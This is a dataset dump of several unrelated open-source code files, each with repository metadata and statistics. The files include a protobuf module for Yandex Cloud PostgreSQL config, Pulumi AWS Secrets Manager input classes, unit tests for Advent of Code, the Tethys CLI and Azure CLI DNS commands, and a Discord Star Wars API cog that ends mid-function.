_POSTGRESQLHOSTCONFIG13_LOGERRORVERBOSITY.containing_type = _POSTGRESQLHOSTCONFIG13
_POSTGRESQLHOSTCONFIG13_LOGSTATEMENT.containing_type = _POSTGRESQLHOSTCONFIG13
_POSTGRESQLHOSTCONFIG13_TRANSACTIONISOLATION.containing_type = _POSTGRESQLHOSTCONFIG13
_POSTGRESQLHOSTCONFIG13_BYTEAOUTPUT.containing_type = _POSTGRESQLHOSTCONFIG13
_POSTGRESQLHOSTCONFIG13_XMLBINARY.containing_type = _POSTGRESQLHOSTCONFIG13
_POSTGRESQLHOSTCONFIG13_XMLOPTION.containing_type = _POSTGRESQLHOSTCONFIG13
_POSTGRESQLHOSTCONFIG13_BACKSLASHQUOTE.containing_type = _POSTGRESQLHOSTCONFIG13
DESCRIPTOR.message_types_by_name['PostgresqlHostConfig13'] = _POSTGRESQLHOSTCONFIG13
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
PostgresqlHostConfig13 = _reflection.GeneratedProtocolMessageType('PostgresqlHostConfig13', (_message.Message,), {
'DESCRIPTOR' : _POSTGRESQLHOSTCONFIG13,
'__module__' : 'yandex.cloud.mdb.postgresql.v1.config.host13_pb2'
# @@protoc_insertion_point(class_scope:yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13)
})
_sym_db.RegisterMessage(PostgresqlHostConfig13)
DESCRIPTOR._options = None
_POSTGRESQLHOSTCONFIG13.fields_by_name['backend_flush_after']._options = None
_POSTGRESQLHOSTCONFIG13.fields_by_name['old_snapshot_threshold']._options = None
_POSTGRESQLHOSTCONFIG13.fields_by_name['from_collapse_limit']._options = None
_POSTGRESQLHOSTCONFIG13.fields_by_name['join_collapse_limit']._options = None
_POSTGRESQLHOSTCONFIG13.fields_by_name['max_parallel_workers']._options = None
_POSTGRESQLHOSTCONFIG13.fields_by_name['max_parallel_workers_per_gather']._options = None
_POSTGRESQLHOSTCONFIG13.fields_by_name['effective_io_concurrency']._options = None
_POSTGRESQLHOSTCONFIG13.fields_by_name['effective_cache_size']._options = None
# @@protoc_insertion_point(module_scope)
| 65.640196
| 9,166
| 0.797769
| 8,550
| 66,953
| 5.878363
| 0.060702
| 0.041385
| 0.087326
| 0.068225
| 0.780919
| 0.764544
| 0.756725
| 0.740251
| 0.718046
| 0.677457
| 0
| 0.054656
| 0.098487
| 66,953
| 1,019
| 9,167
| 65.704612
| 0.778028
| 0.005108
| 0
| 0.613751
| 1
| 0.008089
| 0.233919
| 0.200225
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.006067
| 0
| 0.006067
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
db2a68efc21037b8245aec7fcd6a0709e07240e0
| 2,164
|
py
|
Python
|
sdk/python/pulumi_aws/secretsmanager/_inputs.py
|
mdop-wh/pulumi-aws
|
05bb32e9d694dde1c3b76d440fd2cd0344d23376
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_aws/secretsmanager/_inputs.py
|
mdop-wh/pulumi-aws
|
05bb32e9d694dde1c3b76d440fd2cd0344d23376
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_aws/secretsmanager/_inputs.py
|
mdop-wh/pulumi-aws
|
05bb32e9d694dde1c3b76d440fd2cd0344d23376
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Dict, List, Mapping, Optional, Tuple, Union
from .. import _utilities, _tables
__all__ = [
'SecretRotationRotationRulesArgs',
'SecretRotationRulesArgs',
]
@pulumi.input_type
class SecretRotationRotationRulesArgs:
def __init__(__self__, *,
automatically_after_days: pulumi.Input[float]):
"""
:param pulumi.Input[float] automatically_after_days: Specifies the number of days between automatic scheduled rotations of the secret.
"""
pulumi.set(__self__, "automatically_after_days", automatically_after_days)
@property
@pulumi.getter(name="automaticallyAfterDays")
def automatically_after_days(self) -> pulumi.Input[float]:
"""
Specifies the number of days between automatic scheduled rotations of the secret.
"""
return pulumi.get(self, "automatically_after_days")
@automatically_after_days.setter
def automatically_after_days(self, value: pulumi.Input[float]):
pulumi.set(self, "automatically_after_days", value)
@pulumi.input_type
class SecretRotationRulesArgs:
def __init__(__self__, *,
automatically_after_days: pulumi.Input[float]):
"""
:param pulumi.Input[float] automatically_after_days: Specifies the number of days between automatic scheduled rotations of the secret.
"""
pulumi.set(__self__, "automatically_after_days", automatically_after_days)
@property
@pulumi.getter(name="automaticallyAfterDays")
def automatically_after_days(self) -> pulumi.Input[float]:
"""
Specifies the number of days between automatic scheduled rotations of the secret.
"""
return pulumi.get(self, "automatically_after_days")
@automatically_after_days.setter
def automatically_after_days(self, value: pulumi.Input[float]):
pulumi.set(self, "automatically_after_days", value)
| 36.066667
| 142
| 0.712569
| 242
| 2,164
| 6.090909
| 0.297521
| 0.21981
| 0.268657
| 0.141113
| 0.72863
| 0.72863
| 0.72863
| 0.72863
| 0.72863
| 0.72863
| 0
| 0.000575
| 0.195933
| 2,164
| 59
| 143
| 36.677966
| 0.846552
| 0.28281
| 0
| 0.666667
| 1
| 0
| 0.166323
| 0.166323
| 0
| 0
| 0
| 0
| 0
| 1
| 0.181818
| false
| 0
| 0.151515
| 0
| 0.454545
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
e1d87411fb96da065e806ccc7f4e72aedfc9905b
| 446
|
py
|
Python
|
day2/test_day2.py
|
Sundin/advent-of-code-2019
|
7ba5971ab5deeec61c60e6acbe1ac223876e77fe
|
[
"MIT"
] | null | null | null |
day2/test_day2.py
|
Sundin/advent-of-code-2019
|
7ba5971ab5deeec61c60e6acbe1ac223876e77fe
|
[
"MIT"
] | null | null | null |
day2/test_day2.py
|
Sundin/advent-of-code-2019
|
7ba5971ab5deeec61c60e6acbe1ac223876e77fe
|
[
"MIT"
] | null | null | null |
from day2 import *
import unittest
def test_run_intcode_computer():
assert run_intcode_computer([1,0,0,0,99]) == [2,0,0,0,99]
assert run_intcode_computer([2,3,0,3,99]) == [2,3,0,6,99]
assert run_intcode_computer([2,4,4,5,99,0]) == [2,4,4,5,99,9801]
assert run_intcode_computer([1,1,1,4,99,5,6,0,99]) == [30,1,1,4,2,5,6,0,99]
assert run_intcode_computer([1,9,10,3,2,3,11,0,99,30,40,50]) == [3500,9,10,70,2,3,11,0,99,30,40,50]
| 44.6
| 103
| 0.647982
| 104
| 446
| 2.653846
| 0.259615
| 0.217391
| 0.391304
| 0.434783
| 0.615942
| 0.391304
| 0.094203
| 0.094203
| 0
| 0
| 0
| 0.261965
| 0.109865
| 446
| 9
| 104
| 49.555556
| 0.433249
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.625
| 1
| 0.125
| true
| 0
| 0.25
| 0
| 0.375
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
2252a2644c4f46ed139989cc4c39c1696d549f4a
| 2,996
|
py
|
Python
|
tests/unit_tests/test_tethys_apps/test_cli/test_list_commands.py
|
quyendong/tethys
|
99bcb524d5b2021b88d5fa15b7ed6b8acb460997
|
[
"BSD-2-Clause"
] | 1
|
2020-10-08T20:38:33.000Z
|
2020-10-08T20:38:33.000Z
|
tests/unit_tests/test_tethys_apps/test_cli/test_list_commands.py
|
quyendong/tethys
|
99bcb524d5b2021b88d5fa15b7ed6b8acb460997
|
[
"BSD-2-Clause"
] | 1
|
2018-04-14T19:40:54.000Z
|
2018-04-14T19:40:54.000Z
|
tests/unit_tests/test_tethys_apps/test_cli/test_list_commands.py
|
quyendong/tethys
|
99bcb524d5b2021b88d5fa15b7ed6b8acb460997
|
[
"BSD-2-Clause"
] | 1
|
2021-09-07T14:47:11.000Z
|
2021-09-07T14:47:11.000Z
|
import unittest
import mock
from tethys_apps.cli.list_command import list_command
try:
from StringIO import StringIO
except ImportError:
from io import StringIO # noqa: F401
class ListCommandTests(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
pass
@mock.patch('tethys_apps.cli.list_command.print')
@mock.patch('tethys_apps.cli.list_command.get_installed_tethys_extensions')
@mock.patch('tethys_apps.cli.list_command.get_installed_tethys_apps')
def test_list_command_installed_apps(self, mock_installed_apps, mock_installed_extensions, mock_print):
mock_args = mock.MagicMock()
mock_installed_apps.return_value = {'foo': '/foo', 'bar': "/bar"}
mock_installed_extensions.return_value = {}
list_command(mock_args)
mock_installed_apps.assert_called_once()
# Check if print is called correctly
rts_call_args = mock_print.call_args_list
check_list = []
for i in range(len(rts_call_args)):
check_list.append(rts_call_args[i][0][0])
self.assertIn('Apps:', check_list)
self.assertIn(' foo', check_list)
self.assertIn(' bar', check_list)
@mock.patch('tethys_apps.cli.list_command.print')
@mock.patch('tethys_apps.cli.list_command.get_installed_tethys_extensions')
@mock.patch('tethys_apps.cli.list_command.get_installed_tethys_apps')
def test_list_command_installed_extensions(self, mock_installed_apps, mock_installed_extensions, mock_print):
mock_args = mock.MagicMock()
mock_installed_apps.return_value = {}
mock_installed_extensions.return_value = {'baz': '/baz'}
list_command(mock_args)
# Check if print is called correctly
rts_call_args = mock_print.call_args_list
check_list = []
for i in range(len(rts_call_args)):
check_list.append(rts_call_args[i][0][0])
self.assertIn('Extensions:', check_list)
self.assertIn(' baz', check_list)
@mock.patch('tethys_apps.cli.list_command.print')
@mock.patch('tethys_apps.cli.list_command.get_installed_tethys_extensions')
@mock.patch('tethys_apps.cli.list_command.get_installed_tethys_apps')
def test_list_command_installed_both(self, mock_installed_apps, mock_installed_extensions, mock_print):
mock_args = mock.MagicMock()
mock_installed_apps.return_value = {'foo': '/foo', 'bar': "/bar"}
mock_installed_extensions.return_value = {'baz': '/baz'}
list_command(mock_args)
# Check if print is called correctly
rts_call_args = mock_print.call_args_list
check_list = []
for i in range(len(rts_call_args)):
check_list.append(rts_call_args[i][0][0])
self.assertIn('Apps:', check_list)
self.assertIn(' foo', check_list)
self.assertIn(' bar', check_list)
self.assertIn('Extensions:', check_list)
self.assertIn(' baz', check_list)
| 36.096386
| 113
| 0.693591
| 394
| 2,996
| 4.918782
| 0.139594
| 0.096491
| 0.067079
| 0.087719
| 0.865325
| 0.852941
| 0.852941
| 0.852941
| 0.852941
| 0.852941
| 0
| 0.00375
| 0.198932
| 2,996
| 82
| 114
| 36.536585
| 0.80375
| 0.038385
| 0
| 0.728814
| 0
| 0
| 0.190542
| 0.154381
| 0
| 0
| 0
| 0
| 0.186441
| 1
| 0.084746
| false
| 0.033898
| 0.101695
| 0
| 0.20339
| 0.152542
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
22600a57d4b310a8b8a79c1799a74fce742c848e
| 9,010
|
py
|
Python
|
src/dns/azext_dns/tests/latest/test_dns_commands.py
|
mayank88mahajan/azure-cli-extensions
|
8bd389a1877bffd14052bec5519ce75dc6fc34cf
|
[
"MIT"
] | 1
|
2019-05-10T19:58:09.000Z
|
2019-05-10T19:58:09.000Z
|
src/dns/azext_dns/tests/latest/test_dns_commands.py
|
mayank88mahajan/azure-cli-extensions
|
8bd389a1877bffd14052bec5519ce75dc6fc34cf
|
[
"MIT"
] | null | null | null |
src/dns/azext_dns/tests/latest/test_dns_commands.py
|
mayank88mahajan/azure-cli-extensions
|
8bd389a1877bffd14052bec5519ce75dc6fc34cf
|
[
"MIT"
] | 1
|
2021-07-28T14:50:54.000Z
|
2021-07-28T14:50:54.000Z
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
# pylint: disable=line-too-long
import os
import unittest
from azure.cli.testsdk import ScenarioTest, ResourceGroupPreparer
TEST_DIR = os.path.abspath(os.path.join(os.path.abspath(__file__), '..'))
class DnsScenarioTest(ScenarioTest):
@ResourceGroupPreparer(name_prefix='cli_test_dns')
def test_dns(self, resource_group): # pylint: disable=unused-argument
self.kwargs['zone'] = 'myzone.com'
self.cmd('network dns zone list') # just verify is works (no Exception raised)
self.cmd('network dns zone create -n {zone} -g {rg}')
self.cmd('network dns zone list -g {rg}',
checks=self.check('length(@)', 1))
base_record_sets = 2
self.cmd('network dns zone show -n {zone} -g {rg}',
checks=self.check('numberOfRecordSets', base_record_sets))
args = {
'a': '--ipv4-address 10.0.0.10',
'aaaa': '--ipv6-address 2001:db8:0:1:1:1:1:1',
'caa': '--flags 0 --tag foo --value "my value"',
'cname': '--cname mycname',
'mx': '--exchange 12 --preference 13',
'ns': '--nsdname foobar.com',
'ptr': '--ptrdname foobar.com',
'soa': '--email foo.com --expire-time 30 --minimum-ttl 20 --refresh-time 60 --retry-time 90 --serial-number 123',
'srv': '--port 1234 --priority 1 --target target.com --weight 50',
'txt': '--value some_text'
}
record_types = ['a', 'aaaa', 'caa', 'cname', 'mx', 'ns', 'ptr', 'srv', 'txt']
for t in record_types:
# test creating the record set and then adding records
self.cmd('network dns record-set {0} create -n myrs{0} -g {{rg}} --zone-name {{zone}}'.format(t))
add_command = 'set-record' if t == 'cname' else 'add-record'
self.cmd('network dns record-set {0} {2} -g {{rg}} --zone-name {{zone}} --record-set-name myrs{0} {1}'.format(t, args[t], add_command))
# test creating the record set at the same time you add records
self.cmd('network dns record-set {0} {2} -g {{rg}} --zone-name {{zone}} --record-set-name myrs{0}alt {1}'.format(t, args[t], add_command))
self.cmd('network dns record-set a add-record -g {rg} --zone-name {zone} --record-set-name myrsa --ipv4-address 10.0.0.11')
self.cmd('network dns record-set soa update -g {{rg}} --zone-name {{zone}} {0}'.format(args['soa']))
long_value = '0123456789' * 50
self.cmd('network dns record-set txt add-record -g {{rg}} -z {{zone}} -n longtxt -v {0}'.format(long_value))
typed_record_sets = 2 * len(record_types) + 1
self.cmd('network dns zone show -n {zone} -g {rg}',
checks=self.check('numberOfRecordSets', base_record_sets + typed_record_sets))
self.cmd('network dns record-set a show -n myrsa -g {rg} --zone-name {zone}',
checks=self.check('length(arecords)', 2))
# test list vs. list type
self.cmd('network dns record-set list -g {rg} -z {zone}',
checks=self.check('length(@)', base_record_sets + typed_record_sets))
self.cmd('network dns record-set txt list -g {rg} -z {zone}',
checks=self.check('length(@)', 3))
for t in record_types:
self.cmd('network dns record-set {0} remove-record -g {{rg}} --zone-name {{zone}} --record-set-name myrs{0} {1}'.format(t, args[t]))
self.cmd('network dns record-set a show -n myrsa -g {rg} --zone-name {zone}',
checks=self.check('length(arecords)', 1))
self.cmd('network dns record-set a remove-record -g {rg} --zone-name {zone} --record-set-name myrsa --ipv4-address 10.0.0.11')
self.cmd('network dns record-set a show -n myrsa -g {rg} --zone-name {zone}',
checks=self.is_empty())
self.cmd('network dns record-set a delete -n myrsa -g {rg} --zone-name {zone} -y')
self.cmd('network dns record-set a show -n myrsa -g {rg} --zone-name {zone}')
self.cmd('network dns zone delete -g {rg} -n {zone} -y',
checks=self.is_empty())
@ResourceGroupPreparer(name_prefix='cli_test_dns')
def test_private_dns(self, resource_group): # pylint: disable=unused-argument
self.kwargs['zone'] = 'myprivatezone.com'
self.kwargs['regvnet'] = 'regvnet'
self.kwargs['resvnet'] = 'resvnet'
self.cmd('network vnet create -n {regvnet} -g {rg}')
self.cmd('network vnet create -n {resvnet} -g {rg}')
self.cmd('network dns zone list') # just verify is works (no Exception raised)
self.cmd('network dns zone create -n {zone} -g {rg} --zone-type Private --registration-vnets {regvnet} --resolution-vnets {resvnet}')
self.cmd('network dns zone list -g {rg}',
checks=self.check('length(@)', 1))
self.cmd('network dns zone update -n {zone} -g {rg} --zone-type Private --registration-vnets "" --resolution-vnets ""')
self.cmd('network dns zone update -n {zone} -g {rg} --zone-type Private --registration-vnets {regvnet} --resolution-vnets {resvnet}')
base_record_sets = 1
self.cmd('network dns zone show -n {zone} -g {rg}',
checks=self.check('numberOfRecordSets', base_record_sets))
args = {
'a': '--ipv4-address 10.0.0.10',
'aaaa': '--ipv6-address 2001:db8:0:1:1:1:1:1',
'caa': '--flags 0 --tag foo --value "my value"',
'cname': '--cname mycname',
'mx': '--exchange 12 --preference 13',
'ptr': '--ptrdname foobar.com',
'soa': '--email foo.com --expire-time 30 --minimum-ttl 20 --refresh-time 60 --retry-time 90 --serial-number 123',
'srv': '--port 1234 --priority 1 --target target.com --weight 50',
'txt': '--value some_text'
}
# Private Zones do NOT support delegation through NS records
record_types = ['a', 'aaaa', 'caa', 'cname', 'mx', 'ptr', 'srv', 'txt']
for t in record_types:
# test creating the record set and then adding records
self.cmd('network dns record-set {0} create -n myrs{0} -g {{rg}} --zone-name {{zone}}'.format(t))
add_command = 'set-record' if t == 'cname' else 'add-record'
self.cmd('network dns record-set {0} {2} -g {{rg}} --zone-name {{zone}} --record-set-name myrs{0} {1}'.format(t, args[t], add_command))
# test creating the record set at the same time you add records
self.cmd('network dns record-set {0} {2} -g {{rg}} --zone-name {{zone}} --record-set-name myrs{0}alt {1}'.format(t, args[t], add_command))
self.cmd('network dns record-set a add-record -g {rg} --zone-name {zone} --record-set-name myrsa --ipv4-address 10.0.0.11')
self.cmd('network dns record-set soa update -g {{rg}} --zone-name {{zone}} {0}'.format(args['soa']))
long_value = '0123456789' * 50
self.cmd('network dns record-set txt add-record -g {{rg}} -z {{zone}} -n longtxt -v {0}'.format(long_value))
typed_record_sets = 2 * len(record_types) + 1
self.cmd('network dns zone show -n {zone} -g {rg}',
checks=self.check('numberOfRecordSets', base_record_sets + typed_record_sets))
self.cmd('network dns record-set a show -n myrsa -g {rg} --zone-name {zone}',
checks=self.check('length(arecords)', 2))
# test list vs. list type
self.cmd('network dns record-set list -g {rg} -z {zone}',
checks=self.check('length(@)', base_record_sets + typed_record_sets))
self.cmd('network dns record-set txt list -g {rg} -z {zone}',
checks=self.check('length(@)', 3))
for t in record_types:
self.cmd('network dns record-set {0} remove-record -g {{rg}} --zone-name {{zone}} --record-set-name myrs{0} {1}'.format(t, args[t]))
self.cmd('network dns record-set a show -n myrsa -g {rg} --zone-name {zone}',
checks=self.check('length(arecords)', 1))
self.cmd('network dns record-set a remove-record -g {rg} --zone-name {zone} --record-set-name myrsa --ipv4-address 10.0.0.11')
self.cmd('network dns record-set a show -n myrsa -g {rg} --zone-name {zone}',
checks=self.is_empty())
self.cmd('network dns record-set a delete -n myrsa -g {rg} --zone-name {zone} -y')
self.cmd('network dns record-set a show -n myrsa -g {rg} --zone-name {zone}')
self.cmd('network dns zone delete -g {rg} -n {zone} -y',
checks=self.is_empty())
if __name__ == '__main__':
unittest.main()
| 51.781609
| 150
| 0.575472
| 1,266
| 9,010
| 4.035545
| 0.14218
| 0.063026
| 0.126052
| 0.146408
| 0.895087
| 0.8945
| 0.884713
| 0.874535
| 0.855158
| 0.855158
| 0
| 0.026189
| 0.237181
| 9,010
| 173
| 151
| 52.080925
| 0.717154
| 0.094673
| 0
| 0.775862
| 0
| 0.267241
| 0.526904
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.017241
| false
| 0
| 0.025862
| 0
| 0.051724
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
97db50d2849762e9e8fce2dd03942342c5cab4e4
| 272
|
py
|
Python
|
new-feature.py
|
zacczakk/ismdtutorial
|
219deb5f801e057592c72e73229d0470d0ad38a1
|
[
"Unlicense"
] | 2
|
2021-03-12T17:08:21.000Z
|
2022-03-21T09:09:22.000Z
|
new-feature.py
|
zacczakk/ismdtutorial
|
219deb5f801e057592c72e73229d0470d0ad38a1
|
[
"Unlicense"
] | null | null | null |
new-feature.py
|
zacczakk/ismdtutorial
|
219deb5f801e057592c72e73229d0470d0ad38a1
|
[
"Unlicense"
] | null | null | null |
E = [[ 0, 1, 0, 0, 0, 0],
[E21, 0, 0, E24, E25, 0],
[ 0, 0, 0, 1, 0, 0],
[ 0, 0, E43, 0, 0, -1],
[ 0, 0, 0, 0, 0, 1],
[E61, 0, 0, E64, E65, 0]]
| 38.857143
| 45
| 0.1875
| 37
| 272
| 1.378378
| 0.27027
| 0.627451
| 0.529412
| 0.392157
| 0.470588
| 0.392157
| 0.27451
| 0
| 0
| 0
| 0
| 0.421569
| 0.625
| 272
| 6
| 46
| 45.333333
| 0.078431
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
97e9b2e553509f65526061b8c93b1c492238621a
| 46,884
|
py
|
Python
|
sw/sw.py
|
NIXC/Toxic-Cogs
|
249977008121e3e8dd1bdca487be16228f4a1660
|
[
"MIT"
] | null | null | null |
sw/sw.py
|
NIXC/Toxic-Cogs
|
249977008121e3e8dd1bdca487be16228f4a1660
|
[
"MIT"
] | null | null | null |
sw/sw.py
|
NIXC/Toxic-Cogs
|
249977008121e3e8dd1bdca487be16228f4a1660
|
[
"MIT"
] | null | null | null |
"""
MIT License
Copyright (c) 2018-Present NeuroAssassin
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
import json
from typing import Union
import aiohttp
import discord
from redbot.core import checks, commands
from redbot.core.utils.menus import DEFAULT_CONTROLS, menu
from .image import (
HUMANDESCRIPTION,
IMAGES,
PLANETDESCRIPTION,
PLANETS,
PLANETTHUMBNAIL,
SPECIESDESCRIPTION,
SPECIESTHUMBNAIL,
STARSHIPDESCRIPTIONS,
STARSHIPSIMAGES,
VEHICLEDESCRIPTION,
VEHICLEIMAGE,
)
class SW(commands.Cog):
"""Interact with the Star Wars API"""
def __init__(self, bot):
self.bot = bot
self.session = aiohttp.ClientSession()
def cog_unload(self):
self.__unload()
def __unload(self):
self.session.detach()
async def red_delete_data_for_user(self, **kwargs):
"""This cog does not store user data"""
return
@checks.bot_has_permissions(embed_links=True)
@commands.group(name="swapi", aliases=["starwars"])
async def starwars(self, ctx):
"""Group command for interacting with the Star Wars API"""
pass
@starwars.command()
async def person(self, ctx, person_id: Union[int, str]):
"""Gets the profile of a person by their ID"""
if isinstance(person_id, int):
async with ctx.typing():
response = await self.session.get(
r"https://swapi.dev/api/people/" + str(person_id)
)
if response.status == 404:
return await ctx.send("Invalid Person ID.")
person = json.loads(await response.text())
embed = discord.Embed(
title=f"Person: {person['name']}",
description=HUMANDESCRIPTION[person["name"]],
color=0x32CD32,
)
embed.add_field(name="ID:", value=str(person_id))
for key, value in person.items():
if key in [
"name",
"homeworld",
"films",
"species",
"vehicles",
"starships",
"created",
"edited",
"url",
]:
continue
embed.add_field(name=key.replace("_", " ").title(), value=value.title())
embed.set_thumbnail(url=IMAGES[person["name"]])
homeworld_num = int(person["homeworld"].split(r"/")[-2])
homeworld = await self.session.get(person["homeworld"])
homeworld = json.loads(await homeworld.text())
embed.add_field(
name="Homeworld", value=f"Name: {homeworld['name']}; ID: {str(homeworld_num)}",
)
films = []
for film in person["films"]:
film_num = int(film.split(r"/")[-2])
response = await self.session.get(film)
film = json.loads(await response.text())
films.append(f"Title: {film['title']}; ID: {str(film_num)}")
if len(films) != 0:
embed.add_field(name="Films:", value="\n".join(films))
if person["species"]:
species_num = int(person["species"][0].split(r"/")[-2])
species = await self.session.get(person["species"][0])
species = json.loads(await species.text())
embed.add_field(
name="Species", value=f"Name: {species['name']}; ID: {str(species_num)}",
)
else:
embed.add_field(name="Species", value="Name: Unknown")
vehicles = []
for vehicle in person["vehicles"]:
vehicle_num = int(vehicle.split(r"/")[-2])
response = await self.session.get(vehicle)
vehicle = json.loads(await response.text())
vehicles.append(f"Name: {vehicle['name']}; ID: {str(vehicle_num)}")
if len(vehicles) != 0:
embed.add_field(name="Vehicles:", value="\n".join(vehicles))
starships = []
for starship in person["starships"]:
starship_num = int(starship.split(r"/")[-2])
response = await self.session.get(starship)
starship = json.loads(await response.text())
starships.append(f"Name: {starship['name']}; ID: {str(starship_num)}")
if len(starships) != 0:
embed.add_field(name="Starships:", value="\n".join(starships))
await ctx.send(embed=embed)
else:
async with ctx.typing():
response = await self.session.get(
r"https://swapi.dev/api/people/?search=" + str(person_id)
)
if response.status == 404:
return await ctx.send("Invalid Person ID.")
person = json.loads(await response.text())
name = person["results"][0]["name"]
embed = discord.Embed(
title=f"Person: {name}", description=HUMANDESCRIPTION[name], color=0x32CD32,
)
for key, value in person["results"][0].items():
if key in [
"name",
"homeworld",
"films",
"species",
"vehicles",
"starships",
"created",
"edited",
"url",
]:
continue
embed.add_field(name=key.replace("_", " ").title(), value=value.title())
embed.set_thumbnail(url=IMAGES[name])
homeworld_num = int(person["results"][0]["homeworld"].split(r"/")[-2])
homeworld = await self.session.get(person["results"][0]["homeworld"])
homeworld = json.loads(await homeworld.text())
embed.add_field(
name="Homeworld", value=f"Name: {homeworld['name']}; ID: {str(homeworld_num)}",
)
films = []
for film in person["results"][0]["films"]:
film_num = int(film.split(r"/")[-2])
response = await self.session.get(film)
film = json.loads(await response.text())
films.append(f"Title: {film['title']}; ID: {str(film_num)}")
if len(films) != 0:
embed.add_field(name="Films:", value="\n".join(films))
if person["results"][0]["species"]:
species_num = int(person["results"][0]["species"][0].split(r"/")[-2])
species = await self.session.get(person["species"][0])
species = json.loads(await species.text())
embed.add_field(
name="Species", value=f"Name: {species['name']}; ID: {str(species_num)}",
)
else:
embed.add_field(name="Species", value="Name: Unknown")
vehicles = []
for vehicle in person["results"][0]["vehicles"]:
vehicle_num = int(vehicle.split(r"/")[-2])
response = await self.session.get(vehicle)
vehicle = json.loads(await response.text())
vehicles.append(f"Name: {vehicle['name']}; ID: {str(vehicle_num)}")
if len(vehicles) != 0:
embed.add_field(name="Vehicles:", value="\n".join(vehicles))
starships = []
for starship in person["results"][0]["starships"]:
starship_num = int(starship.split(r"/")[-2])
response = await self.session.get(starship)
starship = json.loads(await response.text())
starships.append(f"Name: {starship['name']}; ID: {str(starship_num)}")
if len(starships) != 0:
embed.add_field(name="Starships:", value="\n".join(starships))
await ctx.send(embed=embed)
@starwars.command()
async def planet(self, ctx, planet_id: Union[int, str]):
"""Gets the profile of a planet by their ID"""
if isinstance(planet_id, int):
async with ctx.typing():
response = await self.session.get(
r"https://swapi.dev/api/planets/" + str(planet_id)
)
if response.status == 404:
return await ctx.send("Invalid Planet ID.")
planet = json.loads(await response.text())
embed = discord.Embed(
title=f"Planet: {planet['name']}",
description=PLANETDESCRIPTION[planet["name"]],
color=0x800080,
)
embed.add_field(name="ID:", value=str(planet_id))
for key, value in planet.items():
if key in [
"name",
"residents",
"films",
"edited",
"created",
"url",
]:
continue
embed.add_field(name=key.replace("_", " ").title(), value=value.title())
embed.set_thumbnail(url=PLANETTHUMBNAIL[planet["name"]])
embed.set_image(url=PLANETS[planet["name"]])
films = []
for film in planet["films"]:
film_num = int(film.split(r"/")[-2])
response = await self.session.get(film)
film = json.loads(await response.text())
films.append(f"Title: {film['title']}; ID: {str(film_num)}")
if len(films) != 0:
embed.add_field(name="Films:", value="\n".join(films))
residents = []
for resident in planet["residents"]:
resident_num = int(resident.split(r"/")[-2])
response = await self.session.get(resident)
resident = json.loads(await response.text())
residents.append(f"Name: {resident['name']}; ID: {str(resident_num)}")
